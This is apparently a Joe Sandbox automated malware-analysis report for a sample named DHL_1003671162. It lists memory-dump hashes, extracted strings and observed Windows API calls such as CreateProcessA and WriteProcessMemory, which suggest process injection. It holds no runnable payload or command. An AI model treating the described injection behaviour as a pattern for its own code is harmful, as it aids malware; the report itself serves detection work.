                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 9f0aa10f3f11bb08ec4d35de136dc2574c25c6955082b42ad27443f059233201
                                                • Instruction ID: 18d3ec0d43a2e86d7b795bafbb4852992df1171851342cdf1f1f40f85bbb7b6c
                                                • Opcode Fuzzy Hash: 9f0aa10f3f11bb08ec4d35de136dc2574c25c6955082b42ad27443f059233201
                                                • Instruction Fuzzy Hash: EF81D3B4E102498FDB08CFAAC984AEEBBB2FF89300F14942AD915AB354D7349905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 8f3332f5ba8bb9006374464d1222eed6b99313443e21b937310446cacfe663a4
                                                • Instruction ID: 4fee9161b6553445ff333195fda2bd31f0d40e540d1f97f3833c49556f1d5fb2
                                                • Opcode Fuzzy Hash: 8f3332f5ba8bb9006374464d1222eed6b99313443e21b937310446cacfe663a4
                                                • Instruction Fuzzy Hash: 1DE16CB0E14206CFCB18CFA9C4818EEFBB2FF59301B15D556D816AB255D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 947c8b387339818d78c27bafb7a6291caa1047e0473b57dda24401f20a85786f
                                                • Instruction ID: 3e0634e4e9ce5e9e0d435cca1b295d3375e1d9009ff784d144471816caf84cff
                                                • Opcode Fuzzy Hash: 947c8b387339818d78c27bafb7a6291caa1047e0473b57dda24401f20a85786f
                                                • Instruction Fuzzy Hash: 40E15EB0E14206CFCB18CFA9C5818AEFBB2FF59300B15D555D816AB255D734EA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 8cd5e4a4f9b4a5abfcb94f9c7e258599ea51b9bccea1520e431d2d6ae813bd23
                                                • Instruction ID: f6b478744a2716ee36397159706f267b185722882e648ece82f822dc73380900
                                                • Opcode Fuzzy Hash: 8cd5e4a4f9b4a5abfcb94f9c7e258599ea51b9bccea1520e431d2d6ae813bd23
                                                • Instruction Fuzzy Hash: E0D14DB0D1420ADFCB18CFA9C4818EEFBB2FF59301B11D556D816AB255D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: aff4e41f9144a1c606c6f6b87310c6eaf4faf7ddc96b75c469c5688e9f298120
                                                • Instruction ID: 8ef57f623fb4aef16ab0629ad0dcbcefd49cdffe3a8c32377d92d8629bf22e79
                                                • Opcode Fuzzy Hash: aff4e41f9144a1c606c6f6b87310c6eaf4faf7ddc96b75c469c5688e9f298120
                                                • Instruction Fuzzy Hash: B1D149B0E1520ADFCB18CFA5C4818AEFBB2FF99301F10D555D816AB254D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5369b72f45b1e7489a50abf2daa758d0a9c88e77af036511ebff72bbe1806ef2
                                                • Instruction ID: ecca7fb87e137403f7e6538e2e35abc1f8c5a6f0d4d7551abd61492f2619f475
                                                • Opcode Fuzzy Hash: 5369b72f45b1e7489a50abf2daa758d0a9c88e77af036511ebff72bbe1806ef2
                                                • Instruction Fuzzy Hash: 0E22BE747012049FDB19EB69C990BAE77F7AF89704F284469E10ADB3A1CB35ED02CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4811b69dd140494a196d8b0420333fb691a8d9e5d69a725ccff4ea5594697487
                                                • Instruction ID: 5966f73c3c28b55b771f0b26a16696e10a36d987eb62ec338a3a462c2ee9e970
                                                • Opcode Fuzzy Hash: 4811b69dd140494a196d8b0420333fb691a8d9e5d69a725ccff4ea5594697487
                                                • Instruction Fuzzy Hash: 7AA149B0D15209DFCB58CFA5D6809DDFBB6FB8A300F20A41AE516BB264D734A946CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af27031cc2fe423a984aa21469a1aedbac274a4ab654f900aff08415b1ac58a4
                                                • Instruction ID: a28d901f4a1b7403198aa4d23360a144e9a7be05824c52d60d28571220b2542e
                                                • Opcode Fuzzy Hash: af27031cc2fe423a984aa21469a1aedbac274a4ab654f900aff08415b1ac58a4
                                                • Instruction Fuzzy Hash: 959112B1E45229DFDB24DF6AC8407EDB7B6AF89300F14A1AAD40DA7251DB745AC1CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04b3c36a31de9afccf276a3b3be461faafa95abe7e65f51ad9f1a270eba6abba
                                                • Instruction ID: c280ffa05b3eb5225e5a89a8e62882b7d8171a6f23a352199fbba40791683f0c
                                                • Opcode Fuzzy Hash: 04b3c36a31de9afccf276a3b3be461faafa95abe7e65f51ad9f1a270eba6abba
                                                • Instruction Fuzzy Hash: B48102B4E54219DFCB04CFA9C8809EEFBB2FF89300F10955AD901AB254D738A912CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0c847561bdc6e8860d0635d86e4ea1704c90fbc5e08331c5cc59af6e751e18a
                                                • Instruction ID: e147f1520cde5c62e0a51803a3d0be70057a47c1d2d765ae8491b122f3019cbf
                                                • Opcode Fuzzy Hash: a0c847561bdc6e8860d0635d86e4ea1704c90fbc5e08331c5cc59af6e751e18a
                                                • Instruction Fuzzy Hash: 6181F0B4E14229DFCB04CFA9C8809EEFBB2FB89300F10955AD911BB254D738A952CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ccb8d61bd5f7e1cedc9f98b9bd413d10422d81365dd06c0fbb3b1544818e853
                                                • Instruction ID: c8eb66d8a5c8183d2c04e7ff0f45c26bd5771e4b45504767068b70dd248ae972
                                                • Opcode Fuzzy Hash: 2ccb8d61bd5f7e1cedc9f98b9bd413d10422d81365dd06c0fbb3b1544818e853
                                                • Instruction Fuzzy Hash: 6F212AB1E016198BEB18CFABD9442DEFBF7AFC9310F14C06AD408A6264DB745A55CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af0cc49e737960f80820e9a1e8eb44b8ee26af5c772b62a4d5119f554beb06fc
                                                • Instruction ID: 09222dee4b88ee8aed80b3ed2f7295ecfaca7ee975a42b434af80c342c044829
                                                • Opcode Fuzzy Hash: af0cc49e737960f80820e9a1e8eb44b8ee26af5c772b62a4d5119f554beb06fc
                                                • Instruction Fuzzy Hash: D421E4B1D056189BEB18CFA7D8457EEFFB6AFC8300F14D16AD40866254DB7409458FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e6aa0c72ce5164a45afa7358fb81869a18d17526d33edb33c62532e8045c9b0
                                                • Instruction ID: 6f8c6109e87fcf83fff4ab9b22f1ea8a37b2f540c548945a138413ce2d64ccbd
                                                • Opcode Fuzzy Hash: 0e6aa0c72ce5164a45afa7358fb81869a18d17526d33edb33c62532e8045c9b0
                                                • Instruction Fuzzy Hash: 8D21D6B0D046189BEB18DFABC8447DEFEF6AFC8300F14D06AD40976254DB7409458FA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-1437089595
                                                • Opcode ID: e2cf52948565056b611961f74c3bf75537ba45615b0ee40482276865804463f1
                                                • Instruction ID: 1e25fc523f8ef3293862a69501d24028c104f81b9a491f190649ca924705084c
                                                • Opcode Fuzzy Hash: e2cf52948565056b611961f74c3bf75537ba45615b0ee40482276865804463f1
                                                • Instruction Fuzzy Hash: EEB194B0E1421DEFCB29CF94C9586EDB7B2BB85700F668459E502AF2D4C7309C49DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2818371802
                                                • Opcode ID: aea3c4b7d533382f6478cdf2ebe80100f7bc2cd50c5c74759f544fb568fac305
                                                • Instruction ID: 1a8244d34577a179dda15b9b916719ad1c7f7c472b629ba9b925ca804b2324e4
                                                • Opcode Fuzzy Hash: aea3c4b7d533382f6478cdf2ebe80100f7bc2cd50c5c74759f544fb568fac305
                                                • Instruction Fuzzy Hash: BAF171B4F40209DFDB289B69C9597BE76E2BB8C701F108425E842AB3D5DB74DC818B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                                                • API String ID: 0-3830373724
                                                • Opcode ID: 5c34a5ce51225b0d8426a64da11ff2234ed4026b45e134694d1ca258e21d196f
                                                • Instruction ID: 27f4e15e12f819d41e676391235c39fc1684f40aa809b4d707d3b96c6a08ba4c
                                                • Opcode Fuzzy Hash: 5c34a5ce51225b0d8426a64da11ff2234ed4026b45e134694d1ca258e21d196f
                                                • Instruction Fuzzy Hash: 94E1A2B4B40205DFDB299B68C959BBE76E2FB8C701F108425E943AB3D4DB749C81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                • API String ID: 0-1901060420
                                                • Opcode ID: 8c16f91d2b8b91358106b7f4012331900b21c2948e9e6548c9cf58fc347f8c84
                                                • Instruction ID: 8b42fcc39ad46ba1361a914ae83eb3f0a58f5da388716bd386dabd3b17ed8a6d
                                                • Opcode Fuzzy Hash: 8c16f91d2b8b91358106b7f4012331900b21c2948e9e6548c9cf58fc347f8c84
                                                • Instruction Fuzzy Hash: 0A41B3B4904249DFCB14DFA8C5A45AEBBB2FF44300F26C8A9C0125B3A5D731C945DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 778 289d088-289d127 GetCurrentProcess 782 289d129-289d12f 778->782 783 289d130-289d164 GetCurrentThread 778->783 782->783 784 289d16d-289d1a1 GetCurrentProcess 783->784 785 289d166-289d16c 783->785 786 289d1aa-289d1c5 call 289d268 784->786 787 289d1a3-289d1a9 784->787 785->784 791 289d1cb-289d1fa GetCurrentThreadId 786->791 787->786 792 289d1fc-289d202 791->792 793 289d203-289d265 791->793 792->793
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0289D116
                                                • GetCurrentThread.KERNEL32 ref: 0289D153
                                                • GetCurrentProcess.KERNEL32 ref: 0289D190
                                                • GetCurrentThreadId.KERNEL32 ref: 0289D1E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 3f377fe35f6efbe6f08ade424db988f684d61ec5ad83189a07de1fa218c4092b
                                                • Instruction ID: b7a8c3fe406c61eda16ce5afac1d6c91288c1e374c9cba66d7c0b35408ee8d3d
                                                • Opcode Fuzzy Hash: 3f377fe35f6efbe6f08ade424db988f684d61ec5ad83189a07de1fa218c4092b
                                                • Instruction Fuzzy Hash: 095175B49012498FDB04DFA9D548B9EFBF1EF48304F248069E419A7360D774A985CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0289D116
                                                • GetCurrentThread.KERNEL32 ref: 0289D153
                                                • GetCurrentProcess.KERNEL32 ref: 0289D190
                                                • GetCurrentThreadId.KERNEL32 ref: 0289D1E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: d6b826b7e0de6619811533f5baab0914d4bc0af2505167ec3f92b85c49fa9171
                                                • Instruction ID: 34fb370b00321013749eac66d150ac05fd3ccb5a475ef89406ca80da9ab594bf
                                                • Opcode Fuzzy Hash: d6b826b7e0de6619811533f5baab0914d4bc0af2505167ec3f92b85c49fa9171
                                                • Instruction Fuzzy Hash: DD5155B4901209CFDB14EFA9D548B9EFBF1EF48304F248069E419A7360D774A984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq$8bq$8bq
                                                • API String ID: 0-2509483264
                                                • Opcode ID: fd47ce13345e15a951b5e1a36d185ca9a4eae50e5d3bd5205369cef07f97658a
                                                • Instruction ID: 91404556f5e17e6201c9f66e59a237b32110fc4bf6276bcff96622af7fc21da3
                                                • Opcode Fuzzy Hash: fd47ce13345e15a951b5e1a36d185ca9a4eae50e5d3bd5205369cef07f97658a
                                                • Instruction Fuzzy Hash: 022147B0628215CFD7388B69D9907FBBBA5FB49319F058267E0A6CB1D1CB38DA408711
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: 5339d731f912bf5d3546571ae0a2ab42bb83958f43946cbf34e5be2ab6594919
                                                • Instruction ID: 7615cfb2358a918e878c71845c9718dabc696617608708b73fa86c2eef3d7e73
                                                • Opcode Fuzzy Hash: 5339d731f912bf5d3546571ae0a2ab42bb83958f43946cbf34e5be2ab6594919
                                                • Instruction Fuzzy Hash: 83818274B40208DFDB299B64C959BFE77A2FB88700F108429E543AB3D4DB758D81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: f002482b7d7aaf16c68ee96e8a3562d033e9504c1a3dd94fa0e7b2a8a4a6542a
                                                • Instruction ID: 5156981bdc51673b4ecc446e99e9f0c0417320a540dd6ebd420b4aa7a9a97f55
                                                • Opcode Fuzzy Hash: f002482b7d7aaf16c68ee96e8a3562d033e9504c1a3dd94fa0e7b2a8a4a6542a
                                                • Instruction Fuzzy Hash: F761A674B40208DFDB299A74C9597BE77A3FB88B00F208429E907AB3D4CB759D41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5$3H5
                                                • API String ID: 0-2752242361
                                                • Opcode ID: 5ea7be22bc40415373672691b972749965a2f72db41d2bb73443d2bfb63663f9
                                                • Instruction ID: 6ecaf3bfba271ce250b38aeb420d9ea9775c05421079f43ddff173c9b175c42d
                                                • Opcode Fuzzy Hash: 5ea7be22bc40415373672691b972749965a2f72db41d2bb73443d2bfb63663f9
                                                • Instruction Fuzzy Hash: 593148B0D1120ADFCB58CFA9D5805EEFBF1BF99200F1495AAD408BB254E7309A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0AE8825E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e49067e969fec1d8b49d9fc95ca0d44c900e44ecc76cee98df59b3e873bbf66f
                                                • Instruction ID: 640e9cf4478b9fdfdcaf5428582aca758ea3499283fc2dc349d0936094c5ffde
                                                • Opcode Fuzzy Hash: e49067e969fec1d8b49d9fc95ca0d44c900e44ecc76cee98df59b3e873bbf66f
                                                • Instruction Fuzzy Hash: EBA17AB1D00619DFEB20DF68C8407EEBBB2BF48354F5485A9E84CA7280DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0AE8825E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 2afb3ba8c6564ef0e880561b2031cbfc398a7c3e78372d634af597fe6f8ad9df
                                                • Instruction ID: b5b2e3f3c0daad979bea909804fc1a68b1dc07cfed6e502102da23e4de9f855b
                                                • Opcode Fuzzy Hash: 2afb3ba8c6564ef0e880561b2031cbfc398a7c3e78372d634af597fe6f8ad9df
                                                • Instruction Fuzzy Hash: B4916AB1D00619DFEB20DF68C8407EEBBB2BF48354F5485A9E84CA7290DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0289AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: d2b9c345fc488069dab0ce543594f130770fbb243bf17a74bc9116529431c721
                                                • Instruction ID: 41367511af85fa3e4cb879f1516099e6c3308415b1b12e564441254580fa0ad3
                                                • Opcode Fuzzy Hash: d2b9c345fc488069dab0ce543594f130770fbb243bf17a74bc9116529431c721
                                                • Instruction Fuzzy Hash: 2F714478A00B058FDB68DF2AC44475ABBF6FF88304F04892DD08AD7A50DB75E946CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 028959A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: c75818e119ff7281d0cfa0ae6c9842fe59de80bbcfa325d83f7fc9a28c5dae3f
                                                • Instruction ID: e46dc4239435914e888eeb5d8c26d9802d15813c472d8fd0d4974ba62c41e8d2
                                                • Opcode Fuzzy Hash: c75818e119ff7281d0cfa0ae6c9842fe59de80bbcfa325d83f7fc9a28c5dae3f
                                                • Instruction Fuzzy Hash: BC41E3B4C00719CFEB24CFA9C84479EBBF5BF49304F248069D409AB251DB75694ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 028959A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: aefc6cdbcf09bebcb39d368cfb86c219609b5856c42c4a932fdaebff37b47b4a
                                                • Instruction ID: 74a366458c9277edc31187ffd042ce89910af8724d0f1eb5b2fff3cb706ab41e
                                                • Opcode Fuzzy Hash: aefc6cdbcf09bebcb39d368cfb86c219609b5856c42c4a932fdaebff37b47b4a
                                                • Instruction Fuzzy Hash: 9041D4B4D00719CFDB24CFA9C88478DBBF5BF45304F24809AD409AB255DB75694ACF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289D367
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: a31237e473fbffba83facdc966b15be3cc7ef88bbfe305afb74684c5731e7be1
                                                • Instruction ID: 554c4aeb92a70aeb1a933912c3f62d7808bbb24f0dfd1d6c2b62c2d007f7e0f1
                                                • Opcode Fuzzy Hash: a31237e473fbffba83facdc966b15be3cc7ef88bbfe305afb74684c5731e7be1
                                                • Instruction Fuzzy Hash: 5731307CA807548FE709DF60F8687693BA9F788359F11882AE9018B3C9EB754C53CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0AE87A30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 11f67d615c289f091d358d48b59d5390dadbb95fd7d68c876421cb9f21921c14
                                                • Instruction ID: a396297a5bbb7a724d2b924b8dae6182fbcd9253af8400718bffed6400027f3b
                                                • Opcode Fuzzy Hash: 11f67d615c289f091d358d48b59d5390dadbb95fd7d68c876421cb9f21921c14
                                                • Instruction Fuzzy Hash: 782135B19002499FDB10DFA9C885BEEBFF1BF48314F148429E998A7250C7789945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0AE87A30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
